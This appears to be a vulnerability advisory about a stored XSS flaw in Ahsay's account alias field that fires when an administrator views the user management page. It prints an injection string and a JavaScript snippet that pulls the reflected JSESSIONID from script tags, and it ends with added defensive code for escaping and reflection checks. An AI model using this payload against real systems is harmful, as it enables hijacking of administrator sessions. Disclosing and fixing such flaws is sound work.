Upgrade to the latest version of Ahsay, currently (

Technical details

When creating an account, the “Alias/Display name” field is vulnerable to stored XSS. The XSS is triggered when an administrator visits the “Users, Groups & Policies” page. This stored XSS can be leveraged to steal the administrator's cookie, because the cookie is reflected in the HTML.

'><script src=></script> 


try {
        var scripts = document.getElementsByTagName("script");
        for (var i = 0; i < scripts.length; ++i) {
                // The session id is reflected after "=" in a script src attribute
                js = scripts[i].getAttribute("src").includes("=");
                if (js){
                        cookie = scripts[i].getAttribute("src").split("=")[1];
                }
        }
} catch (err) {
}
alert(document.URL + ": JSESSIONID=" + cookie);

This results in grabbing the cookie, as shown below:

[Image: Cookie reflected]
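The two root causes described above (an alias written into the page without encoding, and a session id reflected in markup) can be shown side by side with their fix. This is an added example, not code from the advisory or from Ahsay; the function names, the markup shape, and the session id value are assumptions made for illustration.

```javascript
// Added example: names and markup shape are assumptions, not Ahsay's code.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Encode every character that can end an attribute value or open a tag.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Weak form: the alias is concatenated into a single-quoted attribute.
function renderAliasUnsafe(alias) {
  return "<input type='text' name='alias' value='" + alias + "'>";
}

// Corrected form: the alias is encoded for the HTML context before output.
function renderAliasSafe(alias) {
  return "<input type='text' name='alias' value='" + escapeHtml(alias) + "'>";
}

// Review check: list the attributes whose value carries the session id.
// A session id reflected in markup is readable by any script on the page.
function findSessionIdReflections(html, sessionId) {
  const hits = [];
  const attr = /([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)')/g;
  let m;
  while ((m = attr.exec(html)) !== null) {
    const value = m[2] !== undefined ? m[2] : m[3];
    if (value.includes(sessionId)) hits.push(m[1]);
  }
  return hits;
}

// Constructed sample data.
const alias = "'><script src=></script>"; // string as quoted on the page
const sessionId = "0123456789ABCDEF0123456789ABCDEF"; // constructed value
const page = '<script src="/js/app.js;jsessionid=' + sessionId + '"></script>' +
  renderAliasSafe(alias);

console.log(renderAliasUnsafe(alias));
console.log(renderAliasSafe(alias));
console.log(findSessionIdReflections(page, sessionId));
```

Encoding the alias closes the injection point, while the reflection check flags the second issue independently: the session id should not appear in rendered markup at all.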